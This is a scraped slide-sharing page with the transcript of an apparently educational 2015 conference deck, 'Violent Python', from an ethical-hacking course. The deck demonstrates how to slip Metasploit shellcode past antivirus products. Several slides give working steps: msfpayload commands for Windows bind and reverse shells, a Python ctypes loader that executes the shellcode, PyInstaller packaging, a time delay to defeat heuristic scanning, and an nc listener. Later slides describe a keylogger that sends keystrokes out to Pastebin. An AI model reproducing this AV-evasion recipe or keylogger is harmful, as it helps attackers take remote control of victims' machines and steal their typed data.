Violent Python MPICT Winter - PowerPoint Presentation

344 views
Uploaded On 2020-06-23

Violent Python MPICT Winter - PPT Presentation

2015 ICT Educator Conference San Francisco Mon Jan 5 2015 Bio CNIT 124 Advanced Ethical Hacking Violent Python Good coding principles Exception handling Modular design Optimization Commenting ID: 783795

shell norton wins python norton shell python wins bind shellcode windows exe delay tcp memorywithshell kaspersky change avround reverse

Link:

Copy

Embed:

<iframe width="560" height="315" src="https://www.docslides.com/embed/783795" frameborder="0" allowfullscreen></iframe>

Download Presentation from below link

Download The PPT/PDF document "Violent Python MPICT Winter" is the property of its rightful owner. Permission is granted to download and print the materials on this web site for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.

Presentation Transcript

Slide1

Violent PythonMPICT Winter 2015 ICT Educator ConferenceSan FranciscoMon, Jan 5 2015

Slide2

Bio

Slide3

CNIT 124Advanced Ethical Hacking

Slide4

Violent PythonGood coding principlesException handlingModular designOptimizationCommentingFlow chartsFORGET THEM ALL

Slide5

Violent PythonWe are hackersWe are here to BREAK STUFFIt should be fast and easy for a complete novice to hack together a simple script to do something fun!

Slide6

Slide7

Slide8

Slide9

Projects

Slide10

Slide11

AntivirusUngh! Good God y'all...What is it GOOD For?

Slide12

Slide13

Mikko Hypponen Video

Slide14

Metasploit Payloads

Slide15

MetasploitHundreds of payloadsThe simplest one: bind_tcpListens on a TCP port for commands

Slide16

Simple Reverse ShellOne command to produce very simple Windows EXE malware

Slide17

Antivirus Catches It

Slide18

Norton v. Shell.exe

Slide19

Norton Identifies the Metasploit Packer

Slide20

VirusTotal: 37/49 Detections

Slide21

How to Become 007

Slide22

Slide23

Python v. AVRound 1shell_bind_tcp

Slide24

Export Metasploit Payloads to C

Slide25

Use Ctypes Python Library

Slide26

Compile it on WindowsInstall these things, in orderPython 2.7PyWin32pip-WinPyInstallerThis creates an EXE file that listens on a TCP port

Slide27

DEMOOn Kalimsfpayload windows/shell_bind_tcp C > foonano foo

Change top to

from ctypes import *

shellcode = (

Change

bottom to

);

memorywithshell

= create_string_buffer(shellcode, len(shellcode))

shell = cast(memorywithshell, CFUNCTYPE(c_void_p)

)

shell()

Slide28

DEMOOn Windows, in pip-Win:venv -c -i pyi-env-namepyinstaller

--onefile --noconsole foo

Slide29

VirusTotal: 1/50 Detection

Slide30

Norton SupportI Tweeted about this, and @NortonSupport repliedVirusTotal is not a fair test, because real installed Norton uses Heuristic Scanning@NortonSupport gave me a link for a 30-day trial version :)

Slide31

Norton Wins!

Slide32

Kaspersky Wins!Avast! doesn't detect itKaspersky detects it as HEUR:Trojan.Win32.Generic

Slide33

Python v. AVRound 2shell_bind_tcpwith a delay

Slide34

Slide35

Slide36

DEMOOn Kalicp foo foo2nano foo2

x=raw_input("Press Enter to continue")

On Windows, in pip-Win:

venv -c -i pyi-env-name

pyinstaller

--onefile foo2

Slide37

Norton, Avast, & MSE Lose!

Slide38

Kaspersky Wins!

Slide39

Python v. AVRound 3shell_bind_tcpin two stagesno delay

Slide40

Other AVTested on Mar 24, 2014 with a two-stage reverse shell and no time delayAl these failedNortonNod32Avast!360 Internet SecurityMcAfeeKaspersky

Slide41

Remember Mikko?

Slide42

F-Secure Wins!

Slide43

AV Challenge

Slide44

Posted April 3, 2014No reply from AV vendors, but Norton improved its detection after thatNow a delay is required

Slide45

Python v. AVRound 4shell_bind_tcpwith a delay

Slide46

INSTRUCTIONSOn Kalimsfpayload windows/shell_reverse_tcp LHOST=

192.168.119.252 C > rev

nano rev

Change top to

x=raw_input("Press Enter to continue")

from

ctypes import *

shellcode = (

Change

bottom to

);

memorywithshell

= create_string_buffer(shellcode, len(shellcode))

shell = cast(memorywithshell, CFUNCTYPE(c_void_p)

)

shell()

Slide47

INSTRUCTIONSOn Windows, in pip-Win:venv -c -i pyi-env-namepyinstaller --onefile revOn Kali

nc –lp 4444

Slide48

Norton Loses

Slide49

Kaspersky Wins

Slide50

Advanced Malware Protection

Slide51

ty @ChrisAbdalla_1 from HP ESP TippingPoint

Slide52

A friend in the financial industry tested Evil.exe on a system protected by FireEyeFireEye gives no alerts and lets it post keystrokes right to Pastebin

Slide53

Python Keylogger

Slide54

Google "Python Keylogger"I used this one from 4 years ago

Slide55

Post Keystrokes to Pastebin

Slide56

ProblemPastebin busted me for making too many pastes in a 24-hour periodSo I wrote my own Pastebin imitation

Slide57

Kaspersky & Avast! LOSE

Slide58

Norton WINS!